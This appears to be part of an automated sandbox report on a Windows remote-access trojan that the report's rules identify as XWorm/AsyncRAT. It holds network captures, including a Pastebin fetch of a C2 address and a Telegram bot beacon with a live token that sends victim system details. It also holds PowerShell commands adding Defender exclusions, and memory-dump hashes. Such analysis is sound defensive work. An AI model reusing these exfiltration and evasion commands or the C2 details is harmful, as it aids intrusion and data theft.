Dec 20, 2024 19:15:50.825671911 CET | 1.1.1.1 | 192.168.2.9 | 0xb887 | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:55.715518951 CET | 1.1.1.1 | 192.168.2.9 | 0xfe8b | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:16:01.076795101 CET | 1.1.1.1 | 192.168.2.9 | 0xe99a | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:16:05.996234894 CET | 1.1.1.1 | 192.168.2.9 | 0x7d49 | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
• pastebin.com
• api.telegram.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49717 | 208.95.112.1 | 80 | 7544 | C:\Users\user\Desktop\2QaN4hOyJs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 19:14:03.662343979 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 20, 2024 19:14:04.814275026 CET | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 18:14:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49849 | 104.20.3.235 | 443 | 7544 | C:\Users\user\Desktop\2QaN4hOyJs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 18:15:02 UTC | 74 | OUT | GET /raw/4X62dQQ8 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-12-20 18:15:03 UTC | 391 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 18:15:03 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Fri, 20 Dec 2024 18:15:03 GMT
Server: cloudflare
CF-RAY: 8f519d94dd3543b5-EWR
2024-12-20 18:15:03 UTC | 40 | IN | Data Raw: 32 32 0d 0a 42 72 69 61 6e 31 32 33 31 32 31 2d 32 37 37 39 36 2e 70 6f 72 74 6d 61 70 2e 69 6f 3a 32 37 37 39 36 0d 0a
Data Ascii: 22Brian123121-27796.portmap.io:27796
2024-12-20 18:15:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49854 | 149.154.167.220 | 443 | 7544 | C:\Users\user\Desktop\2QaN4hOyJs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 18:15:05 UTC | 442 | OUT | GET /bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20System HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-12-20 18:15:05 UTC | 344 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.18.0
Date: Fri, 20 Dec 2024 18:15:05 GMT
Content-Type: application/json
Content-Length: 84
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-20 18:15:05 UTC | 84 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d
Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}


Target ID: 0
Start time: 13:13:58
Start date: 20/12/2024
Path: C:\Users\user\Desktop\2QaN4hOyJs.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\2QaN4hOyJs.exe"
Imagebase: 0xe40000
File size: 171'520 bytes
MD5 hash: 0999F25F0123E520BB0259A5741F621B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 2
Start time: 13:14:03
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 13:14:04
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 13:14:11
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 13:14:11
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 13:14:22
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 13:14:22
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 13:14:37
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                    Target ID:13
                                                                                                    Start time:13:14:37
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true


Execution Graph

Execution Coverage: 18%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 16.7%
Total number of Nodes: 18
Total number of Limit Nodes: 0

Control-flow Graph (graph rendering omitted; entry node 7ff887d10610)

Strings
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID:
• String ID: 6B$6B$6B$6B$"rB$0DL$0DL$8ML$/B$/B$CAO_^
• API String ID: 0-4060078286

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID:
• String ID: 6B$6B$6B$6B
• API String ID: 0-1106462266

Control-flow Graph (graph rendering omitted; entry node 7ff887d125e3, calls CheckRemoteDebuggerPresent)

APIs
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0

Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph (graph rendering omitted; entry node 7ff887d1955d, calls RtlSetProcessIsCritical)

APIs
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0

Control-flow Graph (graph rendering omitted; entry node 7ff887d1a0a8, calls SetWindowsHookExW)

APIs
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph (graph rendering omitted; entry node 7ff887d18dd8, calls SetWindowsHookExW)

APIs
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph (graph rendering omitted; entry node 7ff887d17031, calls CheckRemoteDebuggerPresent)

APIs
Memory Dump Source
• Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0

Strings
Memory Dump Source
• Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
Similarity
• API ID:
• String ID: X7:
• API String ID: 0-2847653297

Memory Dump Source
• Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                      • Opcode ID: 4726e8d11bb74fb2b366dba29aae01b168958c988355876464e72f97f5105672
                                                                                                      • Instruction ID: 77735eef2ba165200b738c71c143e7399dfa5b8543ed6c8d949af5f757cc7fe1
                                                                                                      • Opcode Fuzzy Hash: 4726e8d11bb74fb2b366dba29aae01b168958c988355876464e72f97f5105672
                                                                                                      • Instruction Fuzzy Hash: 8141E977E489934FF342A66CAC560FD37A0FFA22A5B0C0177D0898F097FA191447C692
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fb1e15910c1085fd44917be07ec0e9f66eda12202a488db1cdf0c4209134d863
                                                                                                      • Instruction ID: 014c0dae5fa4146040d33424f3f0c7c2b8bebf064bf0eb2fe94fb3fe423be01c
                                                                                                      • Opcode Fuzzy Hash: fb1e15910c1085fd44917be07ec0e9f66eda12202a488db1cdf0c4209134d863
                                                                                                      • Instruction Fuzzy Hash: 18412D71D0CB898FE758AF5CA8066FD7BE0FB55311F00427FE04993296DA24A816C7C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452409881.00007FF887C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887c1d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b14a27fa6e56c76490afbfdcd89a19586befcf1e1def3a96b8cc9a3796dae81
                                                                                                      • Instruction ID: 51db985ac8d3c7dcad6dff79ca1de3b204fe3d7f260c3409227281f73c40efb4
                                                                                                      • Opcode Fuzzy Hash: 6b14a27fa6e56c76490afbfdcd89a19586befcf1e1def3a96b8cc9a3796dae81
                                                                                                      • Instruction Fuzzy Hash: 3C41007080DBC44FE75A8B38E8459523FF0FF56365B1506EFD089CB1A3D625A84AC7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d56f0521a9222442e828214fe965118a945c0868f74a22b161be275e3b1937af
                                                                                                      • Instruction ID: 8ee11ed9a14f809ba1f436e9ccbf327a306c8f3eedb6c837f48ed8430867b37a
                                                                                                      • Opcode Fuzzy Hash: d56f0521a9222442e828214fe965118a945c0868f74a22b161be275e3b1937af
                                                                                                      • Instruction Fuzzy Hash: 9921483190C74C8FEB18DFAC9C4A7E97BF0EB96320F04426BD049C3156DA74A41ACB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2a329a33f23f8c82734cc1e6439698990a84e2e11eab2b6815b9d820f62ce1c3
                                                                                                      • Instruction ID: 17ae8eaa1cfb00e265368a252cd782ea22f5acbc9a3439f72ec2b63320fdf731
                                                                                                      • Opcode Fuzzy Hash: 2a329a33f23f8c82734cc1e6439698990a84e2e11eab2b6815b9d820f62ce1c3
                                                                                                      • Instruction Fuzzy Hash: 2921C332D4DA874FE3A5DA18965117866E2FF67B90B6901BAC01EC75E6DE2CEC04C241
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8b9daf9bbc5ba7b486e2f6a8baab1876da91c601ffcda379a08e4f5451000db
                                                                                                      • Instruction ID: 3e6ead0033ffb17fda42b438c7d294def6013a5becd297f47ebbe26b46d0d709
                                                                                                      • Opcode Fuzzy Hash: b8b9daf9bbc5ba7b486e2f6a8baab1876da91c601ffcda379a08e4f5451000db
                                                                                                      • Instruction Fuzzy Hash: 2411EC32D4E6854FE6A5EA2895505BC7BE1FF43AA075910BAD01DD7897EA2DAC00C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: 00939e82c87dace164199d7fdabe4939007464bef50cb10c5f43c6540cefc411
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: 7501A73110CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3655DA36E882CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c40587e08063aaff118fa67055d5959fe85947c3b4dd620162e8e7ee28dd3b5f
                                                                                                      • Instruction ID: 433a9f57ab59cf5f47c8f6f9f7edcf0bd21d229a84f74d458bf996fb6603ec9a
                                                                                                      • Opcode Fuzzy Hash: c40587e08063aaff118fa67055d5959fe85947c3b4dd620162e8e7ee28dd3b5f
                                                                                                      • Instruction Fuzzy Hash: 69E09A31A4C4098FD668EB4CE1409EC73E1FF9A360B2100BAE11EC3922CA3AEC51CB40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                      • API String ID: 0-3225005683
                                                                                                      • Opcode ID: 42e848afd41f9e98cab51089798ecf43228fd8a6561ec69735c08984e7bfe547
                                                                                                      • Instruction ID: 635874a5d90029aad58ff7785026dbc983037610f464485794687ad2c305017e
                                                                                                      • Opcode Fuzzy Hash: 42e848afd41f9e98cab51089798ecf43228fd8a6561ec69735c08984e7bfe547
                                                                                                      • Instruction Fuzzy Hash: 222104B7A081258ED2417BBDB8046ED3740CB962B434592B2D2A98B003EB1864878AF1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: UAWA
                                                                                                      • API String ID: 0-1492024814
                                                                                                      • Opcode ID: 14dccef942d5ea3906fd9e3db11afcfe24db773817a0fa235a7cdedd571f2314
                                                                                                      • Instruction ID: 0eff942d5994aa95aa6bc4d6685716528dc53f32af51a32980dfe28bad8be7be
                                                                                                      • Opcode Fuzzy Hash: 14dccef942d5ea3906fd9e3db11afcfe24db773817a0fa235a7cdedd571f2314
                                                                                                      • Instruction Fuzzy Hash: 4F410B3191CB888FD7199F5CAC066A9BBF0FB55710F04426FD45AD3296CA24B856CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a9b955dc3538bbbca6cd1befce1bc7d9d4583cc9bc6cbf2636822a31551c8b54
                                                                                                      • Instruction ID: f47cc7d3be0382db735e52de9a028b9dde16636e1d35849cfdb4e1240260f366
                                                                                                      • Opcode Fuzzy Hash: a9b955dc3538bbbca6cd1befce1bc7d9d4583cc9bc6cbf2636822a31551c8b54
                                                                                                      • Instruction Fuzzy Hash: 16D13331D4DACA8FE7A59B6898155B97BF0FF16390B0802FED44ECB4D7DA18A805C342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 58a937657f3a02451ad1bb88b1f7fff27cac311a8684986414d217958a54b1e6
                                                                                                      • Instruction ID: 7780a45cccb7a34d735792b641adc69cefa8951044c2f25712590641e714f812
                                                                                                      • Opcode Fuzzy Hash: 58a937657f3a02451ad1bb88b1f7fff27cac311a8684986414d217958a54b1e6
                                                                                                      • Instruction Fuzzy Hash: 3F51E632E4CE864FE7999A2C945167877E2FF95260B2802BEC10FD719BDE19EC05C351
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7ed825bd7719a72e566770f4126d6184c5c17715b3461c1b5d78016dc94c3a74
                                                                                                      • Instruction ID: 5603f02e9e6f6edccb763b9075bb7235c37639c38943970d4b7335916cd758ba
                                                                                                      • Opcode Fuzzy Hash: 7ed825bd7719a72e566770f4126d6184c5c17715b3461c1b5d78016dc94c3a74
                                                                                                      • Instruction Fuzzy Hash: 06414C32E8CA894FE7A5D76C94106BC77E1FF453A0B0802BAC05EE718BEA19AC14C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1567647819.00007FF887C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C0D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887c0d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 33b82652472d780ed20b8724d1b541b0e6afd55060425744e1ac572deb935766
                                                                                                      • Instruction ID: cfb7585e26b1ed6625ea78139b7ab22e8e6ecf198754b22ab8ff3d2f9abe199d
                                                                                                      • Opcode Fuzzy Hash: 33b82652472d780ed20b8724d1b541b0e6afd55060425744e1ac572deb935766
                                                                                                      • Instruction Fuzzy Hash: F641117184DBC44FE7569B28D845A523FF1FF53360B1906DFD088CB1A3D629A84AC7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b797597b1eb47c62776e6af23a8afee41303b7b3f29ff34ff4f19ce5b899e21a
                                                                                                      • Instruction ID: bba4d18c068f44641c79d89d16c10797a5e7023b4ea999c663ce6c6da04f5c91
                                                                                                      • Opcode Fuzzy Hash: b797597b1eb47c62776e6af23a8afee41303b7b3f29ff34ff4f19ce5b899e21a
                                                                                                      • Instruction Fuzzy Hash: 24212B3190C74C4FDB59DB6C984A7E97FF0EB96320F04426FD449C3156DA74A846CB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ff07e796592d432b45cfa1e712ba00fc1d7f8abf7b4be8f46f4be1df1adb268
                                                                                                      • Instruction ID: 4c41af0acd411ea7304051df8e82283e96aef8222190b8763701215627094b06
                                                                                                      • Opcode Fuzzy Hash: 0ff07e796592d432b45cfa1e712ba00fc1d7f8abf7b4be8f46f4be1df1adb268
